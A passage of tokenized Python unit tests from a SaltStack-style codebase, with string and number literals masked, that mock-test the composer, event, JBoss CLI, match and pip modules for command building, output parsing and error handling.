__salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaises ( CommandExecutionError , composer . selfupdate ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT:A>' } ) <EOL> with patch . dict ( composer . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertTrue ( composer . selfupdate ( quiet = True ) ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( composer , '<STR_LIT>' , mock ) : <EOL> rval = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT:A>' , '<STR_LIT>' : '<STR_LIT:B>' } <EOL> mock = MagicMock ( return_value = rval ) <EOL> with patch . dict ( composer . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertEqual ( composer . selfupdate ( ) , rval ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( ComposerTestCase , needs_daemon = False ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> from salttesting import TestCase , skipIf <EOL> from salttesting . mock import ( <EOL> MagicMock , <EOL> patch , <EOL> NO_MOCK , <EOL> NO_MOCK_REASON <EOL> ) <EOL> from salt . modules import event <EOL> import salt . utils . event <EOL> import sys <EOL> sys . path . append ( '<STR_LIT>' ) <EOL> event . __grains__ = { } <EOL> event . __salt__ = { } <EOL> event . __context__ = { } <EOL> event . __opts__ = { } <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class EventTestCase ( TestCase ) : <EOL> '''<STR_LIT>''' <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_fire_master ( self , <EOL> salt_crypt_sauth , <EOL> salt_transport_channel_factory ) : <EOL> '''<STR_LIT>''' <EOL> preload = { '<STR_LIT:id>' : '<STR_LIT:id>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:data>' : '<STR_LIT:data>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> with patch . dict ( event . __opts__ , { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:id>' : '<STR_LIT:id>' , <EOL> '<STR_LIT>' : False } ) : <EOL> with patch . object ( salt_transport_channel_factory , '<STR_LIT>' , <EOL> return_value = None ) : <EOL> self . assertTrue ( event . fire_master ( '<STR_LIT:data>' , '<STR_LIT>' ) ) <EOL> with patch . dict ( event . __opts__ , { '<STR_LIT>' : '<STR_LIT:A>' , <EOL> '<STR_LIT:id>' : '<STR_LIT:id>' , <EOL> '<STR_LIT>' : '<STR_LIT:localhost>' , <EOL> '<STR_LIT>' : False } ) : <EOL> with patch . object ( salt_crypt_sauth , '<STR_LIT>' , <EOL> return_value = '<STR_LIT>' ) : <EOL> with patch . object ( salt_transport_channel_factory , '<STR_LIT>' , <EOL> return_value = None ) : <EOL> self . assertTrue ( event . fire_master ( '<STR_LIT:data>' , '<STR_LIT>' , preload ) ) <EOL> with patch . dict ( event . __opts__ , { '<STR_LIT>' : '<STR_LIT:A>' , '<STR_LIT>' : False } ) : <EOL> with patch . object ( salt . utils . event . 
MinionEvent , '<STR_LIT>' , <EOL> side_effect = Exception ( '<STR_LIT:foo>' ) ) : <EOL> self . assertFalse ( event . fire_master ( '<STR_LIT:data>' , '<STR_LIT>' ) ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_fire ( self , salt_utils_event ) : <EOL> '''<STR_LIT>''' <EOL> with patch . object ( salt_utils_event , '<STR_LIT>' ) : <EOL> self . assertFalse ( event . fire ( '<STR_LIT:data>' , '<STR_LIT>' ) ) <EOL> with patch . dict ( event . __opts__ , { '<STR_LIT>' : True , '<STR_LIT>' : True } ) : <EOL> with patch . object ( salt_utils_event , '<STR_LIT>' ) as mock : <EOL> mock . fire_event = MagicMock ( return_value = True ) <EOL> self . assertTrue ( event . fire ( '<STR_LIT:data>' , '<STR_LIT>' ) ) <EOL> def test_send ( self ) : <EOL> '''<STR_LIT>''' <EOL> with patch . object ( event , '<STR_LIT>' , return_value = '<STR_LIT:B>' ) : <EOL> self . assertEqual ( event . send ( '<STR_LIT>' ) , '<STR_LIT:B>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( EventTestCase , needs_daemon = False ) </s>
<s> from __future__ import absolute_import <EOL> import re <EOL> from salttesting . unit import TestCase <EOL> from salttesting . helpers import ensure_in_syspath <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> from salt . modules import jboss7_cli <EOL> from salt . exceptions import CommandExecutionError <EOL> try : <EOL> __salt__ <EOL> except NameError : <EOL> from salt . ext . six . moves import builtins as __builtin__ <EOL> __builtin__ . __salt__ = { } <EOL> class CmdMock ( object ) : <EOL> commands = [ ] <EOL> command_response_func = None <EOL> cli_commands = [ ] <EOL> default_response = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '''<STR_LIT>''' , '<STR_LIT>' : '<STR_LIT>' } <EOL> def __init__ ( self , command_response_func = None ) : <EOL> self . command_response_func = command_response_func <EOL> def run_all ( self , command ) : <EOL> self . commands . append ( command ) <EOL> if self . command_response_func is not None : <EOL> return self . command_response_func ( command ) <EOL> cli_command = self . __get_cli_command ( command ) <EOL> self . cli_commands . append ( cli_command ) <EOL> return self . default_response <EOL> @ staticmethod <EOL> def __get_cli_command ( command ) : <EOL> command_re = re . compile ( r'<STR_LIT>' , re . DOTALL ) <EOL> m = command_re . search ( command ) <EOL> if m : <EOL> cli_command = m . group ( <NUM_LIT:1> ) <EOL> return cli_command <EOL> return None <EOL> def get_last_command ( self ) : <EOL> if len ( self . commands ) > <NUM_LIT:0> : <EOL> return self . commands [ - <NUM_LIT:1> ] <EOL> else : <EOL> return None <EOL> def get_last_cli_command ( self ) : <EOL> if len ( self . cli_commands ) > <NUM_LIT:0> : <EOL> return self . cli_commands [ - <NUM_LIT:1> ] <EOL> else : <EOL> return None <EOL> def clear ( self ) : <EOL> self . commands = [ ] <EOL> self . command_response_func = None <EOL> self . 
cli_commands = [ ] <EOL> class JBoss7CliTestCase ( TestCase ) : <EOL> org_cmd_run_all = None <EOL> cmd = CmdMock ( ) <EOL> jboss_config = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> def setUp ( self ) : <EOL> self . cmd . clear ( ) <EOL> if '<STR_LIT>' in __salt__ : <EOL> self . org_cmd_run_all = __salt__ [ '<STR_LIT>' ] <EOL> __salt__ [ '<STR_LIT>' ] = self . cmd . run_all <EOL> def tearDown ( self ) : <EOL> if self . org_cmd_run_all is not None : <EOL> __salt__ [ '<STR_LIT>' ] = self . org_cmd_run_all <EOL> def test_controller_authentication ( self ) : <EOL> jboss7_cli . run_operation ( self . jboss_config , '<STR_LIT>' ) <EOL> self . assertEqual ( self . cmd . get_last_command ( ) , '<STR_LIT>' ) <EOL> def test_controller_without_authentication ( self ) : <EOL> jboss_config = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> jboss7_cli . run_operation ( jboss_config , '<STR_LIT>' ) <EOL> self . assertEqual ( self . cmd . get_last_command ( ) , '<STR_LIT>' ) <EOL> def test_operation_execution ( self ) : <EOL> operation = r'<STR_LIT>' <EOL> jboss7_cli . run_operation ( self . jboss_config , operation ) <EOL> self . assertEqual ( self . cmd . get_last_command ( ) , r'<STR_LIT>' ) <EOL> def test_handling_jboss_error ( self ) : <EOL> def command_response ( command ) : <EOL> return { '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : r'''<STR_LIT>''' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . cmd . command_response_func = command_response <EOL> result = jboss7_cli . run_operation ( self . jboss_config , '<STR_LIT>' ) <EOL> self . assertFalse ( result [ '<STR_LIT:success>' ] ) <EOL> self . 
assertEqual ( result [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_handling_cmd_not_exists ( self ) : <EOL> def command_response ( command ) : <EOL> return { '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '''<STR_LIT>''' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . cmd . command_response_func = command_response <EOL> try : <EOL> jboss7_cli . run_operation ( self . jboss_config , '<STR_LIT>' ) <EOL> assert False <EOL> except CommandExecutionError as e : <EOL> self . assertTrue ( str ( e ) . startswith ( '<STR_LIT>' ) ) <EOL> def test_handling_other_cmd_error ( self ) : <EOL> def command_response ( command ) : <EOL> return { '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '''<STR_LIT>''' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . cmd . command_response_func = command_response <EOL> try : <EOL> jboss7_cli . run_command ( self . jboss_config , '<STR_LIT>' ) <EOL> self . fail ( '<STR_LIT>' ) <EOL> except CommandExecutionError as e : <EOL> self . assertTrue ( str ( e ) . startswith ( '<STR_LIT>' ) ) <EOL> def test_matches_cli_output ( self ) : <EOL> text = '''<STR_LIT>''' <EOL> self . assertTrue ( jboss7_cli . _is_cli_output ( text ) ) <EOL> def test_not_matches_cli_output ( self ) : <EOL> text = '''<STR_LIT>''' <EOL> self . assertFalse ( jboss7_cli . _is_cli_output ( text ) ) <EOL> def test_parse_flat_dictionary ( self ) : <EOL> text = '''<STR_LIT>''' <EOL> result = jboss7_cli . _parse ( text ) <EOL> self . assertEqual ( len ( result ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_parse_nested_dictionary ( self ) : <EOL> text = '''<STR_LIT>''' <EOL> result = jboss7_cli . _parse ( text ) <EOL> self . assertEqual ( len ( result ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( len ( result [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . 
assertEqual ( result [ '<STR_LIT>' ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_parse_string_after_dict ( self ) : <EOL> text = '''<STR_LIT>''' <EOL> result = jboss7_cli . _parse ( text ) <EOL> self . assertTrue ( result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_parse_all_datatypes ( self ) : <EOL> text = '''<STR_LIT>''' <EOL> result = jboss7_cli . _parse ( text ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] , '<STR_LIT:success>' ) <EOL> self . assertIsNone ( result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] , False ) <EOL> self . assertTrue ( result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_multiline_strings_with_escaped_quotes ( self ) : <EOL> text = r'''<STR_LIT>''' <EOL> result = jboss7_cli . _parse ( text ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertTrue ( result [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] , r'''<STR_LIT>''' ) <EOL> def test_handling_double_backslash_in_return_values ( self ) : <EOL> text = r'''<STR_LIT>''' <EOL> result = jboss7_cli . _parse ( text ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] , '<STR_LIT:success>' ) <EOL> self . assertEqual ( result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( result [ '<STR_LIT:result>' ] [ '<STR_LIT:value>' ] , r'<STR_LIT>' ) <EOL> def test_numbers_without_quotes ( self ) : <EOL> text = r'''<STR_LIT>''' <EOL> result = jboss7_cli . _parse ( text ) <EOL> self . 
assertEqual ( result [ '<STR_LIT>' ] , '<STR_LIT:success>' ) <EOL> self . assertEqual ( result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> self . assertIsNone ( result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] ) <EOL> def test_all_datasource_properties ( self ) : <EOL> text = r'''<STR_LIT>''' <EOL> result = jboss7_cli . _parse ( text ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] , '<STR_LIT:success>' ) <EOL> self . assertEqual ( result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] , <NUM_LIT:20> ) <EOL> self . assertIsNone ( result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] ) <EOL> self . assertIsNone ( result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] ) <EOL> self . assertFalse ( result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] ) <EOL> def test_datasource_resource_one_attribute_description ( self ) : <EOL> cli_output = '''<STR_LIT>''' <EOL> result = jboss7_cli . _parse ( cli_output ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] , '<STR_LIT:success>' ) <EOL> conn_url_attributes = result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT:type>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT:description>' ] , '<STR_LIT>' ) <EOL> self . assertTrue ( conn_url_attributes [ '<STR_LIT>' ] ) <EOL> self . assertFalse ( conn_url_attributes [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_datasource_complete_resource_description ( self ) : <EOL> cli_output = '''<STR_LIT>''' <EOL> result = jboss7_cli . _parse ( cli_output ) <EOL> self . 
assertEqual ( result [ '<STR_LIT>' ] , '<STR_LIT:success>' ) <EOL> conn_url_attributes = result [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT:type>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT:description>' ] , '<STR_LIT>' ) <EOL> self . assertTrue ( conn_url_attributes [ '<STR_LIT>' ] ) <EOL> self . assertFalse ( conn_url_attributes [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( conn_url_attributes [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_escaping_operation_with_backslashes_and_quotes ( self ) : <EOL> operation = r'<STR_LIT>' <EOL> jboss7_cli . run_operation ( self . jboss_config , operation ) <EOL> self . assertEqual ( self . cmd . get_last_command ( ) , r'<STR_LIT>' ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> from salttesting import TestCase , skipIf <EOL> from salttesting . mock import ( <EOL> MagicMock , <EOL> patch , <EOL> NO_MOCK , <EOL> NO_MOCK_REASON <EOL> ) <EOL> from salttesting . helpers import ensure_in_syspath <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> from salt . modules import match <EOL> import salt . ext . six . moves . builtins as __builtin__ <EOL> match . __grains__ = { } <EOL> match . __salt__ = { } <EOL> match . __opts__ = { } <EOL> match . __pillar__ = { } <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class MatchTestCase ( TestCase ) : <EOL> '''<STR_LIT>''' <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_compound ( self , mock_matcher ) : <EOL> '''<STR_LIT>''' <EOL> with patch . dict ( match . __grains__ , { '<STR_LIT:id>' : <NUM_LIT> } ) : <EOL> mock_matcher . side_effect = MagicMock ( ) <EOL> with patch . object ( mock_matcher , '<STR_LIT>' , MagicMock ( ) ) : <EOL> self . assertTrue ( match . compound ( '<STR_LIT>' ) ) <EOL> mock_matcher . side_effect = MagicMock ( return_value = '<STR_LIT:B>' ) <EOL> self . assertFalse ( match . compound ( '<STR_LIT>' ) ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_ipcidr ( self , mock_matcher ) : <EOL> '''<STR_LIT>''' <EOL> with patch . dict ( match . __grains__ , { '<STR_LIT:id>' : <NUM_LIT> } ) : <EOL> mock_matcher . side_effect = MagicMock ( ) <EOL> with patch . object ( mock_matcher , '<STR_LIT>' , MagicMock ( ) ) : <EOL> self . assertTrue ( match . ipcidr ( '<STR_LIT>' ) ) <EOL> mock_matcher . side_effect = MagicMock ( return_value = '<STR_LIT:B>' ) <EOL> self . assertFalse ( match . ipcidr ( '<STR_LIT>' ) ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_pillar ( self , mock_matcher ) : <EOL> '''<STR_LIT>''' <EOL> with patch . dict ( match . __grains__ , { '<STR_LIT:id>' : <NUM_LIT> } ) : <EOL> mock_matcher . side_effect = MagicMock ( ) <EOL> with patch . object ( mock_matcher , '<STR_LIT>' , MagicMock ( ) ) : <EOL> self . 
assertTrue ( match . pillar ( '<STR_LIT>' ) ) <EOL> mock_matcher . side_effect = MagicMock ( return_value = '<STR_LIT:B>' ) <EOL> self . assertFalse ( match . pillar ( '<STR_LIT>' ) ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_data ( self , mock_matcher ) : <EOL> '''<STR_LIT>''' <EOL> with patch . dict ( match . __grains__ , { '<STR_LIT:id>' : <NUM_LIT> } ) : <EOL> mock_matcher . side_effect = MagicMock ( ) <EOL> with patch . object ( mock_matcher , '<STR_LIT>' , MagicMock ( ) ) : <EOL> self . assertTrue ( match . data ( '<STR_LIT>' ) ) <EOL> mock_matcher . side_effect = MagicMock ( return_value = '<STR_LIT:B>' ) <EOL> self . assertFalse ( match . data ( '<STR_LIT>' ) ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_grain_pcre ( self , mock_matcher ) : <EOL> '''<STR_LIT>''' <EOL> with patch . dict ( match . __grains__ , { '<STR_LIT:id>' : <NUM_LIT> } ) : <EOL> mock_matcher . side_effect = MagicMock ( ) <EOL> with patch . object ( mock_matcher , '<STR_LIT>' , MagicMock ( ) ) : <EOL> self . assertTrue ( match . grain_pcre ( '<STR_LIT>' ) ) <EOL> mock_matcher . side_effect = MagicMock ( return_value = '<STR_LIT:B>' ) <EOL> self . assertFalse ( match . grain_pcre ( '<STR_LIT>' ) ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_grain ( self , mock_matcher ) : <EOL> '''<STR_LIT>''' <EOL> with patch . dict ( match . __grains__ , { '<STR_LIT:id>' : <NUM_LIT> } ) : <EOL> mock_matcher . side_effect = MagicMock ( ) <EOL> with patch . object ( mock_matcher , '<STR_LIT>' , MagicMock ( ) ) : <EOL> self . assertTrue ( match . grain ( '<STR_LIT>' ) ) <EOL> mock_matcher . side_effect = MagicMock ( return_value = '<STR_LIT:B>' ) <EOL> self . assertFalse ( match . grain ( '<STR_LIT>' ) ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_list_ ( self , mock_matcher ) : <EOL> '''<STR_LIT>''' <EOL> with patch . dict ( match . __grains__ , { '<STR_LIT:id>' : <NUM_LIT> } ) : <EOL> mock_matcher . side_effect = MagicMock ( ) <EOL> with patch . 
object ( mock_matcher , '<STR_LIT>' , MagicMock ( ) ) : <EOL> self . assertTrue ( match . list_ ( '<STR_LIT>' ) ) <EOL> mock_matcher . side_effect = MagicMock ( return_value = '<STR_LIT:B>' ) <EOL> self . assertFalse ( match . list_ ( '<STR_LIT>' ) ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_pcre ( self , mock_matcher ) : <EOL> '''<STR_LIT>''' <EOL> mock_matcher . side_effect = MagicMock ( ) <EOL> with patch . dict ( match . __grains__ , { '<STR_LIT:id>' : <NUM_LIT> } ) : <EOL> with patch . object ( mock_matcher , '<STR_LIT>' , MagicMock ( ) ) : <EOL> self . assertTrue ( match . pcre ( '<STR_LIT>' ) ) <EOL> mock_matcher . side_effect = MagicMock ( return_value = '<STR_LIT:B>' ) <EOL> with patch . dict ( match . __grains__ , { '<STR_LIT:id>' : <NUM_LIT> } ) : <EOL> self . assertFalse ( match . pcre ( '<STR_LIT>' ) ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_glob ( self , mock_matcher ) : <EOL> '''<STR_LIT>''' <EOL> with patch . dict ( match . __grains__ , { '<STR_LIT:id>' : <NUM_LIT> } ) : <EOL> mock_matcher . side_effect = MagicMock ( ) <EOL> with patch . object ( mock_matcher , '<STR_LIT>' , MagicMock ( ) ) : <EOL> self . assertTrue ( match . glob ( '<STR_LIT>' ) ) <EOL> mock_matcher . side_effect = MagicMock ( return_value = '<STR_LIT:B>' ) <EOL> self . assertFalse ( match . glob ( '<STR_LIT>' ) ) <EOL> def test_filter_by ( self ) : <EOL> '''<STR_LIT>''' <EOL> with patch . object ( __builtin__ , '<STR_LIT>' , MagicMock ( ) ) : <EOL> self . assertEqual ( match . filter_by ( { '<STR_LIT:key>' : '<STR_LIT:value>' } , <EOL> minion_id = <NUM_LIT> ) , '<STR_LIT:value>' ) <EOL> self . assertEqual ( match . filter_by ( { '<STR_LIT:key>' : '<STR_LIT:value>' } ) , '<STR_LIT:value>' ) <EOL> self . assertEqual ( match . filter_by ( { } ) , None ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( MatchTestCase , needs_daemon = False ) </s>
<s> from __future__ import absolute_import <EOL> import os <EOL> from salttesting import skipIf , TestCase <EOL> from salttesting . helpers import ensure_in_syspath <EOL> from salttesting . mock import NO_MOCK , NO_MOCK_REASON , MagicMock , patch <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> from salt . modules import pip <EOL> from salt . exceptions import CommandExecutionError <EOL> pip . __salt__ = { '<STR_LIT>' : lambda _ : '<STR_LIT>' } <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class PipTestCase ( TestCase ) : <EOL> def test_fix4361 ( self ) : <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( requirements = '<STR_LIT>' ) <EOL> expected_cmd = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> mock . assert_called_once_with ( <EOL> expected_cmd , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_editable_without_egg_fails ( self ) : <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaises ( <EOL> CommandExecutionError , <EOL> pip . install , <EOL> editable = '<STR_LIT>' <EOL> ) <EOL> def test_install_multiple_editable ( self ) : <EOL> editables = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> expected = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> for item in editables : <EOL> expected . extend ( [ '<STR_LIT>' , item ] ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( editable = editables ) <EOL> mock . 
assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( editable = '<STR_LIT:U+002C>' . join ( editables ) ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_multiple_pkgs_and_editables ( self ) : <EOL> pkgs = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> editables = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> expected = [ '<STR_LIT>' , '<STR_LIT>' ] + pkgs <EOL> for item in editables : <EOL> expected . extend ( [ '<STR_LIT>' , item ] ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkgs = pkgs , editable = editables ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkgs = '<STR_LIT:U+002C>' . join ( pkgs ) , editable = '<STR_LIT:U+002C>' . join ( editables ) ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkgs = pkgs [ <NUM_LIT:0> ] , editable = editables [ <NUM_LIT:0> ] ) <EOL> mock . 
assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , pkgs [ <NUM_LIT:0> ] , '<STR_LIT>' , editables [ <NUM_LIT:0> ] ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_issue5940_install_multiple_pip_mirrors ( self ) : <EOL> mirrors = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> expected = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for item in mirrors : <EOL> expected . extend ( [ '<STR_LIT>' , item ] ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( mirrors = mirrors ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( mirrors = '<STR_LIT:U+002C>' . join ( mirrors ) ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( mirrors = mirrors [ <NUM_LIT:0> ] ) <EOL> mock . 
